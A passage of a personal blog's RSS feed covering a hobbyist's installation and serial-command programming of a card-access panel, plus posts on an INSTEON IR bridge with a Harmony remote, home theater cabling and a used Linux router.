<li><span style="font-family: Times New Roman; font-size: 12pt;">Mount whatever comm interface you have next, I stuck mine right next to my CA cabinet because I plan to use a serial server, not programming the panel using a pc connected directly to the panel.  If you do not use a serial server you can extend the cables on your comm interface, refer to the manual for the maximum cable length.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Wire up the comm interface into the panel&#8211;this was 4 wires, refer to the manual of the comm interface for a diagram.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Attach your cabinet ground to your house ground.  I used a conduit ground clamp because in my garage the conduit is exposed.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Wire in your power supply to the comm interface and panel&#8211;depending on your comm interface/panel you may be able to use one power supply for both&#8211;read your panel and comm interface manual to see if this applies to you.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Connect the battery on the door of your cabinet to your panel, ensure the 3V coin battery is also installed in your panel.  This battery is just like the one on your PC&#8217;s motherboard to save the BIOS info on your PC, this saves the programming of your panel in the event of extended power loss.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Plug in the power supply(s) for the CA panel and comm interface<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Plug the serial cable into a PC and test the comm interface out using HyperTerminal to test the panel and comm interface now that it&#8217;s on the wall.  Refer back to the testing section for this.<br />
</span></li>
</ol>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Card Readers (CRs)<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Following the instructions that came with your card reader mount it where you want, ADA requires that the reader be at a height of 54&#8243;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Outputs<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">If you are using any inductive load&#8217;s on the outputs you MUST use a S-4 Suppressor Kit, one on the panel and one at load.  Polarity doesn&#8217;t matter with the S-4 suppressors just wire them in.<br />
</span></p>
<p><a href="http://michael.requeny.com/wp-content/uploads/2008/09/s4-suppresor.jpg" rel="lightbox[321]"><img src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC9.jpg" border="0" alt="" /></a><span style="font-family: Times New Roman; font-size: 12pt;"><br />
</span></p>
<p style="margin-left: 36pt;"><span style="font-family: Times New Roman; font-size: 12pt;">S-4 Suppressor Kit Installation<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Do not use the panel/comm interface/reader power supply(s) to also power locks or loads.  <strong>This will break your shit</strong>.<strong><br />
</strong>You should keep the relay output wires and any other wires separated (don&#8217;t zip tie them together or run them parallel to each other unless they are at least 12&#8243; apart—this is what Honeywell says…)<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">I haven&#8217;t installed an electric strike on my home system yet but will soon.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 24pt;"><strong>Programming the Panel<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Now the fun begins, fire up HyperTerminal and connect to your C-100-A1, using the baud rate set on the dip switches on the CA panel.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Remember to prefix EVERY command with a space.  This is why the manual has _ before every command so you know to hit spacebar!  I didn&#8217;t read that part and banged my head against the wall for awhile when I first got my panel&#8230;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Initialize the panel<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">I believe this is the command that resets and clears everything—I didn&#8217;t have to use this as my panel was wiped when I received it.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_I=1_R&#8221;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Set Buffer/Print Options<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">We want verbose output, we need to see all activity on the panel so we can know a card is read properly among other things<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_M=1_L&#8221;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Panel 1 will buffer and now outputs all activity<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Time &amp; Date<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Setting the time and date for accurate logging of events.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Set Time:<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_T=1_hh:mm&#8221;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Set Date:<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_D=1_mm/dd_day&#8221;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Day = 1-7, 1=Monday, 2=Tuesday, 3=Wednesday, 4=Thursday, 5=Friday, 6=Saturday, 7=Sunday.  Consult manual if you are setting this in a leap year&#8230;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Set Format<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">This is how the panel will interperate card data.  I used:<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_F=pn_1_26_S_1_D_1_B1_B2_B3_B4&#8243;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">This is for CR-1 Wiegand Card Swipe Reader—but it worked for my HID Prox readers…consult the manual for other types of cards<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Assign Names<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">You can set names to Panels, and Outputs.  This makes understanding the output of your panel much easier. (12 characters max)<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Name your panel:<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_N=1_R_0_GARAGEPANEL&#8221;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Name your output:<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_N=1_O_1_GARAGEDOOR&#8221;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Add codes (cards/keycodes)<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">It&#8217;s time to program your cards/keycodes into the CA panel.  I usually just swipe the card to make sure the reader sees it and watch the output in HyperTerminal—this ensures the card works.<br />
</span></p>
<p>&#8220;_C=1_card#_1_1_2&#8243;<span style="font-family: Times New Roman; font-size: 12pt;"><br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Assign CR to O&#8217;s<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Finally you program what CR activates what O<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">&#8220;_A=1_1_O_1&#8243;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Now go test, you should see your output energize when you use your card.  Now the thoughts come into your mind to have more outputs and readers&#8230;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 24pt;"><strong>Controlling more doors<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">So you maxed out your panel and are craving more control, the great thing about these panels is they can be linked together very easily, but read below to ensure you do it right&#8230;<br />
</span></p>
<p><a href="http://michael.requeny.com/wp-content/uploads/2008/09/combus-panels.jpg" rel="lightbox[321]"><img src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC10.jpg" border="0" alt="" /></a><span style="font-family: Times New Roman; font-size: 12pt;"><br />
</span></p>
<p style="margin-left: 36pt;"><span style="font-family: Times New Roman; font-size: 12pt;">N-1000-IV and two N-1000-II in a multi-drop configuration<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>N-1000-II<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Now if in the future you decide to make more doors card access you can simply connect another panel into the first using the comm bus that communicates via a 20mA current loop. If you want to mix in N-1000-III or N-1000-IV panels you need to use the Northern Computers N-485-API-2 (Access Control Panel Interface) which provides an RS485 communications interface to your existing N-1000-II. The N-485-API-2 interface converts the 20mA current loop supplied by the N-1000-II to an RS485 signal.  N-1000-III &amp; N-1000-IV panels communicate using RS485 not the 20ma current loop on the N-1000-II.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>N-1000-III &amp; N-1000-IV<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">You should use more N-1000-III or N-1000-IV panels, there is a door expander panel available for the N-1000-IV that I don&#8217;t know the part # for off the top of my head&#8230;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 24pt;"><strong>Commercial</strong></span><a href="http://michael.requeny.com/wp-content/uploads/2008/09/door_cord.png" rel="lightbox[321]"><img class="alignright" style="border: 0pt  none;" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC12.png" border="0" alt="" width="121" height="119" align="right" /></a></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">In the event you decide you want to do this in your office or something here are a few things to be aware of that don&#8217;t typically apply to homes.<br />
</span></p>
<p><span style="font-family: Times New Roman;"><span style="font-size: 13pt;"><strong>Power Transfer Devices</strong></span><span style="color: blue; font-size: 12pt;"><br />
</span></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">If you use electric panic bars, or other kinds of commercial electric locks you may need to use a power transfer device to get power inside of the door.  These are the different kinds of parts you can use.  One is a door cord and the other is a transfer hinge.</span><a href="http://michael.requeny.com/wp-content/uploads/2008/09/transfer-hinge.jpg" rel="lightbox[321]"><img class="alignright" style="border: 0pt  none;" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC11.jpg" border="0" alt="" width="146" height="160" align="right" /></a></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Code<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">I&#8217;m told NFPA requires card readers be mounted at a height between 40 and 48 inches from the floor.  There is an ADA requirement as well but I would think NFPA is stricter and would be within the ADA requirements.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>REX (Request to Exit)</strong></span><span style="font-family: Times New Roman; font-size: 12pt;"><img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC13.png" alt="" width="150" height="55" align="right" /></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">REX is either a button or a motion sensor&#8211;think about when you exit a grocery store the doors automatically slide apart to let you exit because a motion sensor detects your presence.  This is an example of a REX motion sensor.  Many stores and warehouses on their emergency exit doors have REX panic bars coupled with and magnetic locks&#8211;the ones that say do not open alarm will sound.  These will not unlock immediately when pressed, instead you trigger the alarm and then you have to hold the panic bar pressed in for 15 seconds before the door will will unlock.  This prevents a shoplifter from making a quick get-away, (NFPA requires that they open in either 15 or 30 seconds depending on the area I&#8217;m told.)</span> Examples of REX devices to the right are PIR (like a motion sensor, and buttons)<img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC14.png" alt="" width="101" height="147" align="right" /></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F321&amp;linkname=Card%20Access%20Complete%20Write-up" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F321&amp;linkname=Card%20Access%20Complete%20Write-up" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F321&amp;linkname=Card%20Access%20Complete%20Write-up" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F321&amp;linkname=Card%20Access%20Complete%20Write-up"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/321/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>INSTEON IRLinc Control with Harmony Remote</title>
		<link>http://michael.requeny.com/archives/299</link>
		<comments>http://michael.requeny.com/archives/299#comments</comments>
		<pubDate>Sun, 24 Jan 2010 17:58:09 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[home theater]]></category>
		<category><![CDATA[smarthome]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=299</guid>
		<description><![CDATA[So this was a challenge&#8211;I wanted to eliminate the X10 remote and disable X10 on my INSTEON switches for the home theater.  In doing so I wanted to use the INSTEON IRLinc to convert IR signals to INSTEON.  This would allow me complete control via my Logitech Harmony Remote. I hooked up the IRLinc and [...]]]></description>
			<content:encoded><![CDATA[<p>So this was a challenge&#8211;I wanted to eliminate the X10 remote and disable X10 on my INSTEON switches for the home theater.  In doing so I wanted to use the INSTEON IRLinc to convert IR signals to INSTEON.  This would allow me complete control via my Logitech Harmony Remote.</p>
<p>I hooked up the IRLinc and paired up my devices to Scenes A/B and everything worked fine with the IRLinc credit card remote.  To get the Harmony setup I had to add custom commands for Scene A on/off (Screen Up/Down) and Scene B on/off (Wall Scones on/off).  These had to be learned on the Harmony using the IRLinc remote when I was done I quickly discovered control from the Harmony was very unreliable.  I toyed with this for a few days on and off and eventually got fed<a href="http://michael.requeny.com/wp-content/uploads/2010/01/IMG_0701.jpg" rel="lightbox[299]"><img class="alignright size-medium wp-image-304" title="IRLinc Receiver Mounted" src="http://michael.requeny.com/wp-content/uploads/2010/01/IMG_0701-300x225.jpg" alt="" width="300" height="225" /></a> up and tossed it in a drawer to forget about.</p>
<p>Last night Ken was over and I decided to have two minds look at it <img src='http://michael.requeny.com/wp-includes/images/smilies/icon_razz.gif' alt=':-P' class='wp-smiley' />  I knew it should work, and with a fresh pair of eyes we got it working.  We hooked it up and everything worked properly&#8211;I had previously added the INSTEON switches to the IRLinc&#8217;s scenes and it had retained those settings.  Testing it with the IRLinc&#8217;s credit card remote everything worked fine (as before) but with control via Harmony was very unreliable just as before.  We tried relearning the IR signals and that wasn&#8217;t getting us anywhere while sitting there staring at the screen we saw the &#8220;Custom&#8221; button on the IR Learn page in the Harmony software.  When we hit that we saw that all our learned commands had &#8220;Analyzed&#8221; next to them so we hit the new Learn Raw button that appeared once we hit the Custom button.  The learning process was a lot faster and we quickly updated the remote to test.  Success!  We learned that the Harmony doesn&#8217;t replicate IR codes it learns exactly.  By default the remote analyzes the IR signal and fixes any issues or interferance it encounters (sunlight in the room for example has IR light).  When the Harmony analyzed  the IRLinc&#8217;s signal it would clean the signal so much to the point that the IRLinc wasn&#8217;t able to respond because it wasn&#8217;t receiving the proper IR signal.  Hopefully this post helps others who have IRLinc&#8217;s in drawers from failed integration with Harmony remotes.</p>
<p>We mounted the IRLinc&#8217;s receiver on the front of my A/V receiver since I have no spare IR Emitters.  I don&#8217;t think I&#8217;ll even pickup another IR emitter for this since it&#8217;s always behind a closed door.</p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 12px; width: 1px; height: 1px;">To get the Harmony setup I had to add custom commands for Scene A on/off (Screen Up/Down) and Scene B on/off (Wall Scones on/off).  These had to be learned via the Harmony for it to work and once learned they never worked properly.</div>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F299&amp;linkname=INSTEON%20IRLinc%20Control%20with%20Harmony%20Remote" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F299&amp;linkname=INSTEON%20IRLinc%20Control%20with%20Harmony%20Remote" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F299&amp;linkname=INSTEON%20IRLinc%20Control%20with%20Harmony%20Remote" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F299&amp;linkname=INSTEON%20IRLinc%20Control%20with%20Harmony%20Remote"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/299/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Home Theater Part 6.6 (Power Problems)</title>
		<link>http://michael.requeny.com/archives/280</link>
		<comments>http://michael.requeny.com/archives/280#comments</comments>
		<pubDate>Sat, 14 Nov 2009 19:37:45 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[cables]]></category>
		<category><![CDATA[home theater]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=280</guid>
		<description><![CDATA[I was out of outlets so and saw an APC A/V power conditioner for super cheap&#8211;it has 10 or 12 outlets.  While I was swapping out the old strip (6 outlets) for this one I cleaned up the cables some&#8211;yes this is much much better then before.  I&#8217;ve got 0 outlets to spare.  I may [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michael.requeny.com/wp-content/uploads/2009/12/IMG_0687.jpg" rel="lightbox[280]"><img class="size-medium wp-image-282 alignright" title="Cable Management What?" src="http://michael.requeny.com/wp-content/uploads/2009/12/IMG_0687-300x225.jpg" alt="" width="300" height="225" /></a>I was out of outlets so and saw an APC A/V power conditioner for super cheap&#8211;it has 10 or 12 outlets.  While I was swapping out the old strip (6 outlets) for this one I cleaned up the cables some&#8211;yes this is much much better then before.  I&#8217;ve got 0 outlets to spare.  I may have to add a second duplex outlet on the wall to accommodate my IR to Insteon device, it has a pass-through plug but I don&#8217;t trust running much through it and it takes up an entire duplex outlet&#8211;due to the APC conditioner using a low profile plug&#8230;.</p>
<p>Power Cables:</p>
<ul>
<li>Power Bridge (Feeds PJ and TV)</li>
<li>Receiver</li>
<li>DVD Player</li>
<li>Blu-Ray Player</li>
<li>Cable Box</li>
<li>Wii<a href="http://michael.requeny.com/wp-content/uploads/2009/12/IMG_0688.jpg" rel="lightbox[280]"><img class="size-medium wp-image-281 alignright" title="APC Power Conditioner" src="http://michael.requeny.com/wp-content/uploads/2009/12/IMG_0688-300x225.jpg" alt="" width="300" height="225" /></a></li>
<li>Xbox 360</li>
<li>2 Wiimote Chargers</li>
<li>HDMI Splitter</li>
<li>IR Connecting Block</li>
<li>Harmony Remote Charger</li>
<li>Cordless Phone Charger</li>
<li>2 Lamps</li>
</ul>
<p>I know it needs more work, I plan to bundle up the speaker cables, but other then that there are only a couple of other things I can think of doing to improve this.  All the power cables are bundled near the back of the respective component already&#8230;</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F280&amp;linkname=Home%20Theater%20Part%206.6%20%28Power%20Problems%29" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F280&amp;linkname=Home%20Theater%20Part%206.6%20%28Power%20Problems%29" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F280&amp;linkname=Home%20Theater%20Part%206.6%20%28Power%20Problems%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F280&amp;linkname=Home%20Theater%20Part%206.6%20%28Power%20Problems%29"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/280/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Home Theater Part 6.5</title>
		<link>http://michael.requeny.com/archives/277</link>
		<comments>http://michael.requeny.com/archives/277#comments</comments>
		<pubDate>Thu, 22 Oct 2009 19:06:55 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[home theater]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=277</guid>
		<description><![CDATA[Just picked up a Blu-Ray player on sale @ Amazon (Panasonic DMP-BD60) and now not having an HDMI capable receiver is starting to suck.  Swapping cables between Xbox, Bluray and Cable for the PJ really blows.  Looking at some Onkyos but can&#8217;t make up my mind.   Having to take into account our Zone 2 audio [...]]]></description>
			<content:encoded><![CDATA[<p>Just picked up a Blu-Ray player on sale @ Amazon (Panasonic DMP-BD60<span style="font-family: verdana,arial,helvetica;"><strong></strong></span>) and now not having an HDMI capable receiver is starting to suck.  Swapping cables between Xbox, Bluray and Cable for the PJ really blows.  Looking at some Onkyos but can&#8217;t make up my mind.   Having to take into account our Zone 2 audio (patio) makes it a bit more difficult.  The receivers I&#8217;m looking at have a limitation of only being able to send non-HDCP audio to Zone 2&#8211;therefore I will have to retain an older DVD player for this&#8230;going to be running out of room in the media cabinet quickly now.</p>
<p><a href="http://michael.requeny.com/wp-content/uploads/2009/10/IMG_0689.jpg" rel="lightbox[277]"><img class="size-medium wp-image-284 alignnone" title="Components" src="http://michael.requeny.com/wp-content/uploads/2009/10/IMG_0689-225x300.jpg" alt="" width="225" height="300" /></a><a href="http://michael.requeny.com/wp-content/uploads/2009/10/IMG_0690.jpg" rel="lightbox[277]"><img class="alignnone size-medium wp-image-285" title="Consoles" src="http://michael.requeny.com/wp-content/uploads/2009/10/IMG_0690-300x225.jpg" alt="" width="300" height="225" /></a></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F277&amp;linkname=Home%20Theater%20Part%206.5" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F277&amp;linkname=Home%20Theater%20Part%206.5" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F277&amp;linkname=Home%20Theater%20Part%206.5" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F277&amp;linkname=Home%20Theater%20Part%206.5"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/277/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cheap Linux Router</title>
		<link>http://michael.requeny.com/archives/268</link>
		<comments>http://michael.requeny.com/archives/268#comments</comments>
		<pubDate>Tue, 15 Sep 2009 03:34:47 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[rack]]></category>
		<category><![CDATA[servers]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=268</guid>
		<description><![CDATA[Just picked this up&#8211; Ken found a pair on Craigslist for $50 each, no hdd&#8217;s but x2 2.6ghz dual core procs with 4gb of ram. (DDR2). Working great thus far will be my new Linux Router. No drive sleds so the case is useless, can&#8217;t source them online for a reasonable price will transfer over [...]]]></description>
			<content:encoded><![CDATA[<p>Just picked this up&#8211;<a href="http://michael.requeny.com/wp-content/uploads/2009/12/2009-09-14-21.58.46.jpg" rel="lightbox[268]"><img class="size-medium wp-image-267 alignright" title="GSA" src="http://michael.requeny.com/wp-content/uploads/2009/12/2009-09-14-21.58.46-300x225.jpg" alt="" width="300" height="225" /></a><br />
Ken found a pair on Craigslist for $50 each, no hdd&#8217;s but x2 2.6ghz dual core procs with 4gb of ram. (DDR2).  Working great thus far will be my new Linux Router.<br />
No drive sleds so the case is useless, can&#8217;t source them online for a reasonable price will transfer over into one of my 2U or 4U chassis.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F268&amp;linkname=Cheap%20Linux%20Router" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F268&amp;linkname=Cheap%20Linux%20Router" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F268&amp;linkname=Cheap%20Linux%20Router" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F268&amp;linkname=Cheap%20Linux%20Router"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/268/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Home Theater Part Six</title>
		<link>http://michael.requeny.com/archives/249</link>
		<comments>http://michael.requeny.com/archives/249#comments</comments>
		<pubDate>Thu, 02 Jul 2009 18:56:45 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[home theater]]></category>
		<category><![CDATA[smarthome]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=249</guid>
		<description><![CDATA[PJ Mounted now&#8211; The mount sucks, some cheap junk from flea-bay, having mounted so many projectors in the past using real mounts (using peerless, chief and premier mounts) I should have known better then to use this crap.  It has a ball &#38; socket so you can adjust XYZ, however they all adjust at the [...]]]></description>
			<content:encoded><![CDATA[<p>PJ Mounted now&#8211;<br />
The mount sucks, some cheap junk from flea-bay, having mounted so many projectors in the past using real mounts (using peerless, chief and premier mounts) I should have known better then to use this crap.  It has a ball &amp; socket so you can adjust XYZ, however they all adjust at the same time&#8230;mounts by real manufactures have separated the various  XYZ adjustments. I wont&#8217; make the mistake of using a junk mount again&#8230;Took me some 15-20min to get it squared away and it&#8217;s still slightly off.  I made my own grommet out of some fire retardant nomex, mainly to stop attic debris from falling onto it, and also as a possible fire-stop.  This pic was taken after it had been mounted for awhile, ignore the dirtiness.</p>
<p><a href="http://michael.requeny.com/wp-content/uploads/2009/07/IMG_0698.jpg" rel="lightbox[249]"><img class="alignnone size-medium wp-image-294" title="PJ Mounted" src="http://michael.requeny.com/wp-content/uploads/2009/07/IMG_0698-300x225.jpg" alt="" width="300" height="225" /></a></p>
<p>Controls&#8211;<br />
Harmony 880 for IR, and temporarily using X10 remote for controlling Screen/Sconces.  Can&#8217;t wait to get the Insteon to IR stuff setup so I can chuck the X10 controls&#8230;<br />
<a href="http://michael.requeny.com/wp-content/uploads/2009/07/IMG_0694.jpg" rel="lightbox[249]"><img class="alignnone size-medium wp-image-292" title="Harmony 880" src="http://michael.requeny.com/wp-content/uploads/2009/07/IMG_0694-166x300.jpg" alt="" width="166" height="300" /></a><a href="http://michael.requeny.com/wp-content/uploads/2009/07/IMG_0696.jpg" rel="lightbox[249]"><img class="alignnone size-medium wp-image-293" title="X10 Remote" src="http://michael.requeny.com/wp-content/uploads/2009/07/IMG_0696-284x300.jpg" alt="" width="284" height="300" /></a></p>
